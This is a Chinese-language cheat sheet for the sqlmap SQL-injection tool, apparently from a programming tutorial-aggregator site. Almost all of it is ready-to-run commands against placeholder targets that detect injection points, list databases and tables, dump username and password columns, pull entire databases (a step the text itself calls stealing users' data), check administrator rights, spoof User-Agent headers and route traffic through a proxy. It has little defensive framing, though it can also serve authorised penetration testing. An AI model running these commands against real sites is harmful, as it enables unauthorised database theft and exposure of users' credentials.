概述
sqlmap.py -u "url"
#检测目标网站是否存在注入sqlmap.py -u "url" --dbs
#获取对方数据库所有库的名称sqlmap.py -u "url" -D "security" --tables
#获取security库下的表sqlmap.py -u "url" -D "security" -T "email,users" --column
#获取email表,users表中的字段sqlmap.py -u "url" -D "security" -T "users" -C "id,username,password" --dump
#导出数据指定的数据sqlmap.py -u "url" --dump-all
#拖库,即把网站注册用户的资料数据库盗走的行为
sqlmap.py -u "url" --current-user
#获取当前用户名称sqlmap.py -u "url" --current-db
#获取当前使用的数据的名称sqlmap.py -u "url" -r 1.txt
#指定文件检测注入sqlmap.py -u "url" --dbms "mysql"
#指定数据库类型进行检测sqlmap.py -u "url" -r 1.txt -p "参数名"
#post型注入,-p指定哪个参数注入sqlmap.py -u "url" --forms
#自动搜索表单并测试注入
sqlmap.py -u "url" --dbs -v 4
#显示sqlmap注入的信息
有七个等级,默认为1:
0.只显示python错误以及严重的信息
1.同时显示基本信息和警告信息
2.同时显示debug信息
3.同时显示注入的payload
4.同时显示http请求
5.同时显示http响应头
6.同时显示http响应页面
14.sqlmap.py -u "url" --tamper unmagicquotes
#检测宽字节注入
15.sqlmap.py -u "url" --is-dba
#判断当前用户是否为数据库管理员权限
16.sqlmap.py -u "url" --random-agent
#随机User-Agent头
17.探测等级参数:–level
共有五个等级,默认为1级,这个参数不仅影响用哪些payload同时也会影响测试注入的注入点,GET和POST的数据都会测试,HTTP cookie在level为2 的时候就会测试,HTTP User-Agent/Referer头在level为3的时候就会测试,在不确定哪个payload或者参数为注入点的时候,为了保证全面性,建议使用高的level值
18.风险等级参数:–risk
共有四个风险等级,默认是会测试大部分测试语句,2会增加基于事件的测试语句,3会增加OR语句的SQL注入测试
19.sqlmap.py -u "url" --users
#列数据库用户
20.sqlmap.py -u "url" --batch
#采用默认配置对提示进行设置,即不会询问你的输入
21.sqlmap.py -u "url" --roles 或者 --privileges
#列用户以及权限
22.伪静态注入(使用sqlmap进行):
sqlmap.py -u "www.xxx.com/index.php/news/id/203*.html"
sqlmap.py -u "www.xxx.com/index.php/news/id/10*"
23.使用代理进行注入
--proxy=socks5://127.0.0.1:1080
最后
以上就是飘逸冬日为你收集整理的Sqlmap命令使用的全部内容,希望文章能够帮你解决Sqlmap命令使用所遇到的程序开发问题。
如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。
发表评论 取消回复